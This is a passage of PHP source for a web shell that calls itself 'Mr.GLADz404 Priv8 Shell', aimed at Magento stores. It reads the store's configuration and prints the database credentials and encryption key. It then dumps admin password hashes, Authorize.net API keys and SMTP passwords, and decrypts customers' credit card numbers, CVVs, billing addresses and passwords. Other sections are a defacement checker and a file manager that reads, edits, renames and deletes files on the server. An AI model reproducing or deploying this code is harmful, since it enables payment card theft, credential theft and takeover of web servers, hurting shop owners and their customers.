coded by sohai & n4KuLa_
recoded by ./Mr.GLADz404
INI HANYA DAPAT BERJALAN DI CMS MAGENTO
';
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
$xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
if(isset($xml->global->resources->default_setup->connection)) {
$connection = $xml->global->resources->default_setup->connection;
$prefix = $xml->global->resources->db->table_prefix;
$key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
try {
$app = Mage::app('default');
}
catch(Exception $e) { echo 'Message: ' .$e->getMessage()."
\n";}
if (!mysql_connect($connection->host, $connection->username, $connection->password)){
print("Could not connect: " . mysql_error());
}
mysql_select_db($connection->dbname);
echo $connection->host." | ".$connection->username." | ".$connection->password." | ".$connection->dbname." | $prefix | $key
\n";
$crypto = new Varien_Crypt_Mcrypt();
$crypto->init($key);
//=========================================================================================================
$query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
if (!$query){
echo "
Gagal ";
}else{
$site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
echo'
====================================================================
[ Daftar Admin yang terdaftar di : '.$site['website'].' ]
====================================================================';
}
echo "
id
firstname
lastname
email
username
password
";
while($vx = mysql_fetch_array($query)) {
$no = 1;
$user_id = $vx['user_id'];
$username = $vx['username'];
$password = $vx['password'];
$email = $vx['email'];
$firstname = $vx['firstname'];
$lastname = $vx['lastname'];
echo "$user_id $firstname $lastname $email $username $password ";
}
echo "
";
//=========================================================================================================
$query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
if(mysql_num_rows($query) != 0){
if (!$query){
echo "
Gagal ";
}else{
echo'
====================================================================
[ Authorizenet ]
====================================================================
';
}
echo "
no
user
pass
";
$no = 1;
while($vx = mysql_fetch_array($query)) {
$user = $crypto->decrypt($vx['user']);
$pass = $crypto->decrypt($vx['pass']);
echo "$no $user $pass ";
$no++;
}
echo "
";
}
//=========================================================================================================
$query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
if(mysql_num_rows($query_smtp) != 0){
if (!$query_smtp){
echo "
Gagal ";
}else{
echo'
====================================================================
[ SMTP ]
====================================================================
';
}
echo "
no
host
port
user
pass
";
$no = 1;
$batas = 0;
while($rows = mysql_fetch_array($query_smtp)) {
$smtphost = $rows[0];
$smtpport = $rows[1];
$smtpuser = $rows[2];
$smtppass = $rows[3];
echo "$no $smtphost $smtpport $smtpuser $smtppass ";
$no++;
}
echo "
";
}
//=========================================================================================================
$query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
$query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
echo'
====================================================================
[ Credit Card ]
====================================================================
';
echo "
no
Date
Credit Owner
method
Credit Number
Credit Exp
CVV
Address
";
$no = 1;
$batas = 0;
while($vx = mysql_fetch_array($query)){
$date = $vx['updated_at'];
$cc_owner = $vx['cc_owner'];
$method = $vx['method'];
$cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
$exp = $vx['exp'];
$cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
$Billing_Address = $vx['Billing Address'];
echo "$no $date $cc_owner $method $cc_number_enc $exp $cc_cid_enc $Billing_Address ";
$batas = $no++;
}
while($vx2 = mysql_fetch_array($query2)){
$batas +=1;
$cc_owner = $vx2['cc_owner'];
$method = $vx2['method'];
$cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
$exp = $vx2['exp'];
$cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
$Billing_Address = $vx2['Billing Address'];
echo "$batas $cc_owner $method $cc_number_enc $exp $cc_cid_status $Billing_Address ";
$batas++;
}
echo "
";
}
//=========================================================================================================
$query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
$query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
if (!$query){
echo "
Gagal ";
}else{
echo'
====================================================================
[ Customer ]
====================================================================
';
}
echo "
no
user
pass
";
$no = 1;
$batas = 0;
while($vx = mysql_fetch_array($query)) {
$user = $vx['email'];
$pass = $vx['value'];
echo "$no $user $pass ";
$batas = $no++;
}
if(mysql_num_rows($query2) != 0 && ($query2)){
while($vx2 = mysql_fetch_array($query2)){
$user = $vx2['customer_email'];
$pass = $crypto->decrypt($vx2['password_hash']);
if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
$batas +=1;
echo "$batas $user $pass ";
$batas++;
}
}
}
echo "
";
}
//=========================================================================================================
}
}
function save($format,$data){
$fp = fopen($format, 'a');
fwrite($fp, $data);
fclose($fp);
}
function cekbase64($string){
$decoded = base64_decode($string, true);
if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
if(!base64_decode($string, true)) return false;
if(base64_encode($decoded) != $string) return false;
return true;//nilai return 1 jika true
}
//----untuk decode password ---/
class Varien_Crypt_Mcrypt{
/**
* Constuctor
*
* @param array $data
*/
public function __construct()
{
}
/**
* Initialize mcrypt module
*
* @param string $key cipher private key
* @return Varien_Crypt_Mcrypt
*/
public function init($key)
{
$this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
$iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
$maxKeySize = mcrypt_enc_get_key_size($this->handler);
if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
//throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
return null;
}
mcrypt_generic_init($this->handler, $key, $iv);
return $this;
}
/**
* Encrypt data
*
* @param string $data source string
* @return string
*/
public function encrypt($data)
{
if (!$this->handler) {
//throw new Varien_Exception('Crypt module is not initialized.');
return null;
}
if (strlen($data) == 0) {
return $data;
}
return base64_encode(mcrypt_generic($this->handler, $data));
}
/**
* Decrypt data
*
* @param string $data encrypted string
* @return string
*/
public function decrypt($data)
{
if (!$this->handler) {
//throw new Varien_Exception('Crypt module is not initialized.');
return null;
}
if (strlen($data) == 0) {
return $data;
}
return mdecrypt_generic($this->handler, base64_decode($data));
}
/**
* Desctruct cipher module
*
*/
public function __destruct()
{
if ($this->handler) {
$this->_reset();
}
}
protected function _reset()
{
mcrypt_generic_deinit($this->handler);
mcrypt_module_close($this->handler);
}
}
//DEFACE PAGE CHECKER
} elseif($_GET['gladz404'] == 'pepescek') {
echo '
Deface Page Checker
';
if(isset($_POST['submit'])) {
$text = $_POST['text'];
$items = explode("\n", trim($_POST['domain']));
$items = array_unique(str_replace('http://','',$items));
$total = count($items);
echo '
Total Domains = '.$total.'
';
echo '
Checking Defaced sites ';
echo '
';
$j = 1;
$dc = 0;
$sites = array();
foreach($items as $s) {
$data = file_get_contents('http://'.trim($s));
$cond = strpos($data, $text);
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($cond !== false){ echo 'http://'.$s.' DEFACED '; $sites[] = trim($s); $dc++;
} else { echo 'http://'.$s.' Failed! '; }
$j++;
}
echo '
';
$total = $dc;
echo '
Total Defaced = '.$total.' ';
}
echo '';
//START
} elseif(isset($_GET['filesrc'])){
echo "
Current File : ";
echo $_GET['filesrc'];
echo ' ';
echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).' ');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '
'.$_POST['path'].'
';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '
Change Permission Selesai ';
}else{
echo '
Change Permission Gagal ';
}
}
echo '
Permission :
';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '
Change Name Berhasil ';
}else{
echo '
Change Name Gagal ';
}
$_POST['name'] = $_POST['newname'];
}
echo '
New Name :
';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '
Edit File Berhasil ';
}else{
echo '
Edit File Gagal ';
}
fclose($fp);
}
echo '
'.htmlspecialchars(file_get_contents($_POST['path'])).'
';
}
echo '';
}else{
echo '
';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo 'Delete Dir Berhasil ';
}else{
echo 'Delete Dir Gagal ';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo 'Delete File Berhasil ';
}else{
echo 'Delete File Gagal ';
}
}
}
echo ' ';
$scandir = scandir($path);
echo '
';
}
echo '
./Mr.GLADz404 Priv8 Shell
Copyright © '.date("Y").' - ./Mr.GLADz404